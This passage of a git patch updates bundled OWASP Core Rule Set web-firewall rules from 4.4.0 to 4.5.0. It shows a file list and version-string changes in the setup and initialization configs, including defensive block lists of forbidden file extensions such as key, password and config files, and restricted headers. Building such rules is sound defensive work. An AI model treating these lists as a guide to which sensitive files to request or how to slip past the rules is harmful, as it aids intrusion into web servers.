From 705a226283fc3b9cd85d84202b8d4788c79cbe42 Mon Sep 17 00:00:00 2001 
From: Matteo Pace Date: Thu, 25 Jul 2024 20:08:35 +0200 Subject: [PATCH] updates to CRS 4.5 (#26) --- rules/@crs-setup.conf.example | 54 +- .../REQUEST-901-INITIALIZATION.conf | 62 +- .../REQUEST-905-COMMON-EXCEPTIONS.conf | 6 +- .../REQUEST-911-METHOD-ENFORCEMENT.conf | 20 +- .../REQUEST-913-SCANNER-DETECTION.conf | 20 +- .../REQUEST-920-PROTOCOL-ENFORCEMENT.conf | 136 +- .../REQUEST-921-PROTOCOL-ATTACK.conf | 52 +- .../REQUEST-922-MULTIPART-ATTACK.conf | 8 +- .../REQUEST-930-APPLICATION-ATTACK-LFI.conf | 28 +- .../REQUEST-931-APPLICATION-ATTACK-RFI.conf | 28 +- .../REQUEST-932-APPLICATION-ATTACK-RCE.conf | 126 +- .../REQUEST-933-APPLICATION-ATTACK-PHP.conf | 52 +- ...EQUEST-934-APPLICATION-ATTACK-GENERIC.conf | 36 +- .../REQUEST-941-APPLICATION-ATTACK-XSS.conf | 86 +- .../REQUEST-942-APPLICATION-ATTACK-SQLI.conf | 142 +- ...3-APPLICATION-ATTACK-SESSION-FIXATION.conf | 24 +- .../REQUEST-944-APPLICATION-ATTACK-JAVA.conf | 46 +- .../REQUEST-949-BLOCKING-EVALUATION.conf | 58 +- .../RESPONSE-950-DATA-LEAKAGES.conf | 26 +- .../RESPONSE-951-DATA-LEAKAGES-SQL.conf | 54 +- .../RESPONSE-952-DATA-LEAKAGES-JAVA.conf | 24 +- .../RESPONSE-953-DATA-LEAKAGES-PHP.conf | 28 +- .../RESPONSE-954-DATA-LEAKAGES-IIS.conf | 28 +- rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf | 72 +- .../RESPONSE-959-BLOCKING-EVALUATION.conf | 58 +- .../@owasp_crs/RESPONSE-980-CORRELATION.conf | 44 +- .../911100.yaml | 256 +- .../REQUEST-913-SCANNER-DETECTION/913100.yaml | 224 +- .../920100.yaml | 462 +- .../920120.yaml | 1775 +- .../920121.yaml | 213 +- .../920160.yaml | 189 +- .../920170.yaml | 220 +- .../920171.yaml | 129 +- .../920180.yaml | 144 +- .../920181.yaml | 44 +- .../920190.yaml | 102 +- .../920200.yaml | 302 +- .../920201.yaml | 63 +- .../920202.yaml | 63 +- .../920210.yaml | 215 +- .../920220.yaml | 227 +- .../920221.yaml | 59 +- .../920230.yaml | 68 +- .../920240.yaml | 242 +- .../920250.yaml | 132 +- .../920260.yaml | 90 +- .../920270.yaml | 250 +- .../920271.yaml | 162 +- 
.../920272.yaml | 136 +- .../920273.yaml | 136 +- .../920274.yaml | 172 +- .../920275.yaml | 171 +- .../920280.yaml | 83 +- .../920290.yaml | 108 +- .../920300.yaml | 124 +- .../920310.yaml | 172 +- .../920311.yaml | 88 +- .../920320.yaml | 56 +- .../920330.yaml | 58 +- .../920340.yaml | 72 +- .../920341.yaml | 102 +- .../920350.yaml | 228 +- .../920360.yaml | 40 +- .../920370.yaml | 41 +- .../920380.yaml | 40 +- .../920390.yaml | 46 +- .../920400.yaml | 1753 +- .../920410.yaml | 1811 +- .../920420.yaml | 644 +- .../920430.yaml | 296 +- .../920440.yaml | 220 +- .../920450.yaml | 218 +- .../920451.yaml | 59 +- .../920460.yaml | 144 +- .../920470.yaml | 569 +- .../920480.yaml | 642 +- .../920490.yaml | 105 +- .../920500.yaml | 87 +- .../920510.yaml | 183 +- .../920520.yaml | 273 +- .../920521.yaml | 213 +- .../920530.yaml | 131 +- .../920540.yaml | 99 +- .../920600.yaml | 393 +- .../920610.yaml | 58 +- .../920620.yaml | 27 +- tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 344 +- tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml | 140 +- tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 128 +- tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml | 63 +- tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml | 59 +- tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml | 117 +- tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml | 171 +- tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml | 174 +- tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml | 107 +- tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml | 303 +- tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml | 81 +- tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml | 31 +- tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml | 31 +- tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml | 55 +- tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml | 339 +- tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml | 479 +- .../REQUEST-922-MULTIPART-ATTACK/922100.yaml | 147 +- .../REQUEST-922-MULTIPART-ATTACK/922110.yaml | 99 +- .../REQUEST-922-MULTIPART-ATTACK/922120.yaml | 89 +- .../930100.yaml | 119 +- 
.../930110.yaml | 379 +- .../930120.yaml | 314 +- .../930121.yaml | 383 +- .../930130.yaml | 60 +- .../931100.yaml | 42 +- .../931110.yaml | 118 +- .../931120.yaml | 228 +- .../931130.yaml | 620 +- .../931131.yaml | 32 +- .../932120.yaml | 152 +- .../932125.yaml | 90 +- .../932130.yaml | 488 +- .../932131.yaml | 60 +- .../932140.yaml | 5023 +++-- .../932160.yaml | 414 +- .../932161.yaml | 351 +- .../932170.yaml | 35 +- .../932171.yaml | 63 +- .../932175.yaml | 391 +- .../932180.yaml | 135 +- .../932190.yaml | 191 +- .../932200.yaml | 457 +- .../932205.yaml | 213 +- .../932206.yaml | 93 +- .../932210.yaml | 207 +- .../932220.yaml | 441 +- .../932230.yaml | 1951 +- .../932231.yaml | 39 +- .../932232.yaml | 219 +- .../932235.yaml | 1209 +- .../932236.yaml | 2601 ++- .../932237.yaml | 1001 +- .../932238.yaml | 323 +- .../932239.yaml | 1579 +- .../932240.yaml | 589 +- .../932250.yaml | 384 +- .../932260.yaml | 1384 +- .../932300.yaml | 298 +- .../932301.yaml | 211 +- .../932310.yaml | 243 +- .../932311.yaml | 413 +- .../932320.yaml | 331 +- .../932321.yaml | 183 +- .../932330.yaml | 31 +- .../932331.yaml | 59 +- .../932370.yaml | 125 +- .../932380.yaml | 281 +- .../933100.yaml | 244 +- .../933110.yaml | 882 +- .../933111.yaml | 46 +- .../933120.yaml | 292 +- .../933130.yaml | 172 +- .../933131.yaml | 88 +- .../933140.yaml | 36 +- .../933150.yaml | 943 +- .../933151.yaml | 230 +- .../933160.yaml | 1058 +- .../933161.yaml | 155 +- .../933170.yaml | 300 +- .../933180.yaml | 1031 +- .../933190.yaml | 36 +- .../933200.yaml | 284 +- .../933210.yaml | 595 +- .../933211.yaml | 595 +- .../934100.yaml | 870 +- .../934101.yaml | 294 +- .../934110.yaml | 259 +- .../934120.yaml | 1592 +- .../934130.yaml | 378 +- .../934140.yaml | 32 +- .../934150.yaml | 32 +- .../934160.yaml | 928 +- .../934170.yaml | 99 +- .../941100.yaml | 179 +- .../941101.yaml | 90 +- .../941110.yaml | 304 +- .../941120.yaml | 174 +- .../941130.yaml | 568 +- .../941140.yaml | 122 +- .../941150.yaml | 64 +- 
.../941160.yaml | 460 +- .../941170.yaml | 146 +- .../941180.yaml | 212 +- .../941181.yaml | 124 +- .../941190.yaml | 154 +- .../941200.yaml | 124 +- .../941210.yaml | 159 +- .../941220.yaml | 64 +- .../941230.yaml | 64 +- .../941240.yaml | 60 +- .../941250.yaml | 64 +- .../941260.yaml | 64 +- .../941270.yaml | 62 +- .../941280.yaml | 68 +- .../941290.yaml | 64 +- .../941300.yaml | 62 +- .../941310.yaml | 395 +- .../941320.yaml | 34 +- .../941330.yaml | 62 +- .../941340.yaml | 64 +- .../941350.yaml | 32 +- .../941360.yaml | 100 +- .../941370.yaml | 304 +- .../941380.yaml | 34 +- .../941390.yaml | 256 +- .../941400.yaml | 200 +- .../942100.yaml | 423 +- .../942101.yaml | 311 +- .../942120.yaml | 1181 +- .../942130.yaml | 270 +- .../942131.yaml | 189 +- .../942140.yaml | 512 +- .../942150.yaml | 573 +- .../942151.yaml | 325 +- .../942152.yaml | 87 +- .../942160.yaml | 300 +- .../942170.yaml | 116 +- .../942180.yaml | 232 +- .../942190.yaml | 1548 +- .../942200.yaml | 62 +- .../942210.yaml | 2760 ++- .../942220.yaml | 61 +- .../942230.yaml | 340 +- .../942240.yaml | 334 +- .../942250.yaml | 34 +- .../942251.yaml | 60 +- .../942260.yaml | 34 +- .../942270.yaml | 60 +- .../942280.yaml | 62 +- .../942290.yaml | 276 +- .../942300.yaml | 94 +- .../942310.yaml | 88 +- .../942320.yaml | 376 +- .../942321.yaml | 59 +- .../942330.yaml | 158 +- .../942340.yaml | 332 +- .../942350.yaml | 122 +- .../942360.yaml | 1176 +- .../942361.yaml | 214 +- .../942362.yaml | 966 +- .../942370.yaml | 329 +- .../942380.yaml | 1530 +- .../942390.yaml | 32 +- .../942400.yaml | 68 +- .../942410.yaml | 4016 ++-- .../942420.yaml | 34 +- .../942421.yaml | 34 +- .../942430.yaml | 34 +- .../942431.yaml | 34 +- .../942432.yaml | 34 +- .../942440.yaml | 588 +- .../942450.yaml | 154 +- .../942460.yaml | 64 +- .../942470.yaml | 332 +- .../942480.yaml | 364 +- .../942490.yaml | 664 +- .../942500.yaml | 143 +- .../942510.yaml | 60 +- .../942511.yaml | 60 +- .../942520.yaml | 717 +- .../942521.yaml | 715 +- 
.../942522.yaml | 279 +- .../942530.yaml | 33 +- .../942540.yaml | 231 +- .../942550.yaml | 1047 +- .../942560.yaml | 63 +- .../943100.yaml | 80 +- .../943110.yaml | 144 +- .../943120.yaml | 40 +- .../944000.yaml | 40 +- .../944100.yaml | 664 +- .../944110.yaml | 664 +- .../944120.yaml | 5271 +++--- .../944130.yaml | 15280 ++++++++-------- .../944140.yaml | 272 +- .../944150.yaml | 770 +- .../944151.yaml | 802 +- .../944152.yaml | 834 +- .../944200.yaml | 20 +- .../944210.yaml | 1978 +- .../944240.yaml | 3220 ++-- .../944250.yaml | 808 +- .../944260.yaml | 64 +- .../944300.yaml | 11974 ++++++------ .../949110.yaml | 145 +- .../951110.yaml | 42 +- .../951120.yaml | 43 +- .../951130.yaml | 42 +- .../951140.yaml | 42 +- .../951150.yaml | 41 +- .../951160.yaml | 42 +- .../951170.yaml | 42 +- .../951180.yaml | 42 +- .../951190.yaml | 42 +- .../951200.yaml | 42 +- .../951210.yaml | 42 +- .../951220.yaml | 81 +- .../951230.yaml | 80 +- .../951240.yaml | 80 +- .../951250.yaml | 42 +- .../951260.yaml | 42 +- .../953100.yaml | 184 +- .../953101.yaml | 194 +- .../953120.yaml | 264 +- .../954100.yaml | 36 +- .../954120.yaml | 73 +- tests/RESPONSE-955-WEB-SHELLS/955100.yaml | 118 +- tests/RESPONSE-955-WEB-SHELLS/955260.yaml | 40 +- .../959100.yaml | 113 +- tests/RESPONSE-980-CORRELATION/980170.yaml | 125 +- version.go | 2 +- 318 files changed, 65366 insertions(+), 65695 deletions(-)
diff --git a/rules/@crs-setup.conf.example b/rules/@crs-setup.conf.example
index 5818dbc..3ece119 100644
--- a/rules/@crs-setup.conf.example
+++ b/rules/@crs-setup.conf.example
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -181,7 +181,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.blocking_paranoia_level=1"
@@ -209,7 +209,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.detection_paranoia_level=1"
@@ -235,7 +235,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.enforce_bodyproc_urlencoded=1"
@@ -270,7 +270,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.critical_anomaly_score=5,\
 # setvar:tx.error_anomaly_score=4,\
 # setvar:tx.warning_anomaly_score=3,\
@@ -324,7 +324,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.inbound_anomaly_score_threshold=5,\
 # setvar:tx.outbound_anomaly_score_threshold=4"
@@ -385,7 +385,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.reporting_level=4"
@@ -417,7 +417,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.early_blocking=1"
@@ -438,7 +438,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.enable_default_collections=1"
@@ -466,7 +466,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
 # Content-Types that a client is allowed to send in a request.
@@ -496,7 +496,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # nolog,\
 # tag:'OWASP_CRS',\
 # ctl:ruleRemoveById=920420,\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # chain"
 # SecRule REQUEST_URI "@rx ^/foo/bar" \
 # "t:none"
@@ -510,7 +510,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"
 # Allowed HTTP versions.
@@ -526,7 +526,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'"
 # Forbidden file extensions.
@@ -550,7 +550,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
 # Restricted request headers.
@@ -595,7 +595,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'"
 #
 # [ Extended ]
@@ -621,7 +621,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:'tx.restricted_headers_extended=/accept-charset/'"
 # Content-Types charsets that a client is allowed to send in a request.
@@ -635,7 +635,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'"
 #
@@ -661,7 +661,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.max_num_args=255"
 # Block request if the length of any argument name is too high
@@ -675,7 +675,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.arg_name_length=100"
 # Block request if the length of any argument value is too high
@@ -689,7 +689,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.arg_length=400"
 # Block request if the total length of all combined arguments is too high
@@ -703,7 +703,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.total_arg_length=64000"
 # Block request if the file size of any individual uploaded file is too high
@@ -717,7 +717,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.max_file_size=1048576"
 # Block request if the total size of all combined uploaded files is too high
@@ -731,7 +731,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.combined_file_sizes=1048576"
@@ -771,7 +771,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # pass,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.sampling_percentage=100"
@@ -792,7 +792,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # t:none,\
 # nolog,\
 # tag:'OWASP_CRS',\
-# ver:'OWASP_CRS/4.4.0',\
+# ver:'OWASP_CRS/4.5.0',\
 # setvar:tx.crs_validate_utf8_encoding=1"
@@ -814,5 +814,5 @@ SecAction \
 t:none,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
- setvar:tx.crs_setup_version=440"
+ ver:'OWASP_CRS/4.5.0',\
+ setvar:tx.crs_setup_version=450"
diff --git a/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf b/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf
index d85cfc1..f7719b6 100644
--- a/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf
+++ b/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,7 +7,7 @@
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecComponentSignature "OWASP_CRS/4.4.0"
+SecComponentSignature "OWASP_CRS/4.5.0"
 SecRule &TX:crs_setup_version "@eq 0" \
 "id:901001,\
 phase:1,\
@@ -17,7 +17,7 @@ SecRule &TX:crs_setup_version "@eq 0" \
 auditlog,\
 msg:'ModSecurity CRS is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL'"
 SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
 "id:901100,\
@@ -25,7 +25,7 @@ SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.inbound_anomaly_score_threshold=5'"
 SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
 "id:901110,\
@@ -33,7 +33,7 @@ SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.outbound_anomaly_score_threshold=4'"
 SecRule &TX:reporting_level "@eq 0" \
 "id:901111,\
@@ -41,7 +41,7 @@ SecRule &TX:reporting_level "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.reporting_level=4'"
 SecRule &TX:early_blocking "@eq 0" \
 "id:901115,\
@@ -49,7 +49,7 @@ SecRule &TX:early_blocking "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.early_blocking=0'"
 SecRule &TX:blocking_paranoia_level "@eq 0" \
 "id:901120,\
@@ -57,7 +57,7 @@ SecRule &TX:blocking_paranoia_level "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.blocking_paranoia_level=1'"
 SecRule &TX:detection_paranoia_level "@eq 0" \
 "id:901125,\
@@ -65,7 +65,7 @@ SecRule &TX:detection_paranoia_level "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'"
 SecRule &TX:sampling_percentage "@eq 0" \
 "id:901130,\
@@ -73,7 +73,7 @@ SecRule &TX:sampling_percentage "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.sampling_percentage=100'"
 SecRule &TX:critical_anomaly_score "@eq 0" \
 "id:901140,\
@@ -81,7 +81,7 @@ SecRule &TX:critical_anomaly_score "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.critical_anomaly_score=5'"
 SecRule &TX:error_anomaly_score "@eq 0" \
 "id:901141,\
@@ -89,7 +89,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.error_anomaly_score=4'"
 SecRule &TX:warning_anomaly_score "@eq 0" \
 "id:901142,\
@@ -97,7 +97,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.warning_anomaly_score=3'"
 SecRule &TX:notice_anomaly_score "@eq 0" \
 "id:901143,\
@@ -105,7 +105,7 @@ SecRule &TX:notice_anomaly_score "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.notice_anomaly_score=2'"
 SecRule &TX:allowed_methods "@eq 0" \
 "id:901160,\
@@ -113,7 +113,7 @@ SecRule &TX:allowed_methods "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
 SecRule &TX:allowed_request_content_type "@eq 0" \
 "id:901162,\
@@ -121,7 +121,7 @@ SecRule &TX:allowed_request_content_type "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"
 SecRule &TX:allowed_request_content_type_charset "@eq 0" \
 "id:901168,\
@@ -129,7 +129,7 @@ SecRule &TX:allowed_request_content_type_charset "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'"
 SecRule &TX:allowed_http_versions "@eq 0" \
 "id:901163,\
@@ -137,7 +137,7 @@ SecRule &TX:allowed_http_versions "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'"
 SecRule &TX:restricted_extensions "@eq 0" \
 "id:901164,\
@@ -145,7 +145,7 @@ SecRule &TX:restricted_extensions "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
 SecRule &TX:restricted_headers_basic "@eq 0" \
 "id:901165,\
@@ -153,7 +153,7 @@ SecRule &TX:restricted_headers_basic "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'"
 SecRule &TX:restricted_headers_extended "@eq 0" \
 "id:901171,\
@@ -161,7 +161,7 @@ SecRule &TX:restricted_headers_extended "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.restricted_headers_extended=/accept-charset/'"
 SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \
 "id:901167,\
@@ -169,7 +169,7 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.enforce_bodyproc_urlencoded=0'"
 SecRule &TX:crs_validate_utf8_encoding "@eq 0" \
 "id:901169,\
@@ -177,7 +177,7 @@ SecRule &TX:crs_validate_utf8_encoding "@eq 0" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.crs_validate_utf8_encoding=0'"
 SecAction \
 "id:901200,\
@@ -186,7 +186,7 @@ SecAction \
